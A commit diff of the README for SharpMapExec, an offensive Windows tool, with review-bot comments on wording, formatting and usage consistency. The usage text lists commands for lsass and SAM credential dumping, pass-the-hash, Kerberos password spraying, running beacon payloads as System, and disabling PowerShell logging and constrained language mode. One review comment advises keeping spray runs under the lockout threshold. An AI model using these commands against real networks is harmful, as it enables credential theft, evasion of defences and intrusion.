SharpMapExec, commit 465a8eed
  • .vs/SharpMapExec/v16/.suo
    Binary file.
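Review bot: .vs/SharpMapExec/v16/.suo should not be in the commit; it is Visual Studio's per-user solution options file (window layout, open documents, breakpoints), a binary that changes on every IDE session and contains no source. Remove it from the tree and add `.vs/` to .gitignore so it stops showing up as an unrelated binary change in README commits.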
  • ■ ■ ■ ■ ■
    README.md
    skipped 7 lines
    8 8   
    9 9   
    10 10   
    11  -You can specify if you want to use Kerberos or NTLM authentication. If you choose Kerberos, the tool will create a sacrificial token and use [Rubeus](https://github.com/GhostPack/Rubeus) to import/ask for the ticket. If NTLM is specified, it tool will create threads and use [SharpKatz](https://github.com/b4rtik/SharpKatz) to run SetThreadToken if an NTLM hash is specified, and if a password is specified, it will go with ordinary c# impersonation.
     11 +You can specify if you want to use Kerberos or NTLM authentication. If you choose Kerberos, the tool will create a sacrificial token and use [Rubeus](https://github.com/GhostPack/Rubeus) to import/ask for the ticket. If NTLM is specified, the tool will use [SharpKatz](https://github.com/b4rtik/SharpKatz) `SetThreadToken` or `LogonUser` impersonation.
    12 12   
    13 13  ```
    14 14  SharpMapExec.exe
    15 15   usage:
    16 16   
     17 + --- Cim ---
     18 + Need plaintext password or the /impersonate flag
     19 + SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET
     20 + 
     21 + Available Cim modules
     22 + /m:enable_winrm (Runs Enable-PSRemoting -Force)
     23 + /m:disable_winrm (Runs Disable-PSRemoting -Force)
     24 + /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
     25 + /m:disable_pslogging (Modify registry to disable PowerShell Logging)
     26 + /m:check_pslockdown (Check __PSLockdownPolicy registry)
     27 + /m:check_pslogging (Check PowerShell Logging registry)
     28 + 
     29 + --- Reg32 ---
     30 + SharpMapExec.exe ntlm reg32 /user:USER /ntlm:HASH /computername:TARGET
     31 + SharpMapExec.exe kerberos reg32 </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
     32 + 
     33 + Reg32 modules
     34 + /m:disable_pslockdown (Modify __PSLockdownPolicy registry to disable CLM)
     35 + /m:check_pslockdown (Check __PSLockdownPolicy registry)
     36 + /m:check_pslogging (Check PowerShell Logging registry)
     37 + 
    17 38   --- Smb ---
    18 39   SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
    19 40   SharpMapExec.exe kerberos smb </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
    20 41   
    21  - Available Smb modules
    22  - /m:shares
     42 + Smb modules
     43 + /m:shares (Scan for accessible Smb shares)
    23 44   
    24 45   --- WinRm ---
    25 46   SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET
    26 47   SharpMapExec.exe kerberos winrm </user:USER /rc4:HASH /domain:DOMAIN /dc:DC | /ticket:TICKET.Kirbi> /computername:TARGET
    27 48   
    28  - Available WinRm modules
     49 + WinRm modules
    29 50   /m:exec /a:whoami (Invoke-Command)
    30 51   /m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
    31  - /m:exec /a:C:\beacon.exe /delegwalk (Invoke-Command as all signed in users)
    32  - /m:comsvcs (Dump and Parse Lsass Process)
     52 + /m:comsvcs (Dump & parse lsass)
    33 53   /m:secrets (Dump and Parse Sam, Lsa, and System Dpapi blobs)
    34  - /m:assembly /p:Rubeus.exe /a:dump (Execute Local C# Assembly in memory)
    35  - /m:assembly /p:beacon.exe /system (Execute Local C# Assembly as System in memory)
    36  - /m:download /path:C:\file /destination:file (Download File from Host)
     54 + /m:assembly /p:Rubeus.exe /a:dump (Execute local C# assembly in memory)
     55 + /m:assembly /p:beacon.exe /system (Execute local C# assembly as System in memory)
     56 + /m:assembly /p:getMailBox.exe /delegwalk (Execute local C# assembly in all unique delegation processes in memory)
     57 + /m:download /path:C:\file /destination:file (Download file from host)
     58 + /m:upload /path:C:\file /destination:file (Upload file to host)
    37 59   
    38 60   --- Domain ---
    39 61   SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:DOMAIN /dc:DC
    40 62   SharpMapExec.exe tgtdeleg
     63 + 
     64 + --- Ldap ---
     65 + SharpMapExec.exe ntlm domain /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE
     66 + SharpMapExec.exe kerberos ldap </user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /m:MODULE | /ticket:TICKET.Kirbi>
     67 + 
     68 + Ldap modules
     69 + /m:spraydata (Download user and password policy)
    41 70  ```
    42 71   
    43 72  ### Smb
    44 73   
    45  -Can be used to scan for admin access and accessible Smb shares.
     74 +Can be used to scan for admin access, accessible Smb shares, Smb version and relay signing.
    46 75   
    47  -Modules;
    48 76  ````
    49 77  /m:shares (Scan enumerated shares for access)
    50 78  ````
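Review bot: the new Ldap block is internally inconsistent: the NTLM line reads `SharpMapExec.exe ntlm domain /user:USER ... /m:MODULE` while the section heading and the Kerberos line use `ldap`, so one of the two subcommand names is wrong and anyone copying the example will get a usage error. On the Kerberos line `/m:MODULE` also sits inside the `<... | /ticket:TICKET.Kirbi>` alternative, which reads as if the `/ticket` form takes no module; move it after the closing bracket, the way `/computername:TARGET` is placed on the smb and winrm lines. Two smaller points in the same hunk: the Cim note "Need plaintext password or the /impersonate flag" refers to a `/impersonate` flag that appears nowhere in the usage text, so add it to the Cim example line or document it beside the ntlm/kerberos paragraph above; and the Cim and Reg32 example lines omit the `/domain:DOMAIN` that the smb/winrm lines carry, so state whether it is optional for those protocols. In the Smb description, "Smb version and relay signing" is unclear; "SMB version and whether SMB signing is required (relay exposure)" says what is actually checked.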
    skipped 2 lines
    53 81   
    54 82  The beast. It has built-in Amsi bypass, JEA language breakout, JEA function analysis. Can be used for code execution, scaning for PsRemote access, vulnerable JEA endpoints, and data exfiltration.
    55 83   
    56  -Modules;
    57  - 
    58 84  ````
    59 85  /m:exec /a:whoami (Invoke-Command)
    60 86  /m:exec /a:C:\beacon.exe /system (Invoke-Command as System)
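Review bot: the context line "scaning for PsRemote access" has a typo (scanning); since this commit already touches the module header of this paragraph, fix it here rather than in a later commit. The capability claims "built-in Amsi bypass" and "JEA language breakout" would also be more useful if the paragraph said which `/m:` module exercises them, because the module list that follows does not make that visible.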
    skipped 8 lines
    69 95   
    70 96  Currently supports domain password spraying and to create a TGT for the current user that can be used with the `/ticket` parameter to get the current context.
    71 97   
     98 +### Ldap
     99 + 
     100 +Download necessary data before pw spraying
     101 + 
     102 +```
     103 +/m:spraydata (Download user and password policy)
     104 +```
     105 + 
     106 + 
     107 + 
    72 108  ### Example usage
    73 109   
    74 110  For easy or mass in-memory execution of C# assemblies
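Review bot: the new Ldap section's description "Download necessary data before pw spraying" does not say what the data is or why it should be fetched first; the usage line says "Download user and password policy", so spell out whether that means the user list plus the domain password policy (lockout threshold and observation window) and note that the point is to size a kerbspray run so it stays under the lockout threshold. Also, the fence here uses three backticks while the neighbouring Smb and WinRm module blocks use four, and the hunk adds three trailing blank lines before "### Example usage"; use one fence style throughout and a single blank line.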
    skipped 20 lines
    95 131   
    96 132  ![](images/delegwalk.png)
    97 133   
    98  -Scan for SMB signing and SMBv1, Danke Pingcastle
     134 +Scan for SMB signing and SMBv1
    99 135   
    100 136  ![](images/smbvscan.png)
    101 137   
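Review bot: dropping "Danke Pingcastle" from the caption is fine because Pingcastle is still credited in the list at the bottom, but this example stays screenshot-only: neither the Smb usage block, which lists only `/m:shares`, nor this caption shows the command that produces the signing/SMBv1 scan, so a reader cannot reproduce "Scan for SMB signing and SMBv1" from the text. Add the invocation as a line above the image, as the module lists do for the other features.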
    skipped 21 lines
    123 159  * [SharpSecDump](https://github.com/G0ldenGunSec/SharpSecDump) [@G0ldenGunSec](https://twitter.com/G0ldenGunSec)
    124 160  * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
    125 161  * [Pingcastle ](https://github.com/vletoux/pingcastle) [@mysmartlogon](https://twitter.com/mysmartlogon)
     162 +* [SharpSpray](https://github.com/jnqpblc/SharpSpray)
     163 + 
    126 164   
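Review bot: the new SharpSpray credit is the only entry in the list without an author handle, and the hunk adds two trailing blank lines after it; add the handle for consistency with the other entries and keep a single blank line at the end of the list. The context line "Pingcastle " also carries a stray space inside the link text.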
  • SharpMapExec/Program.cs
    Content is identical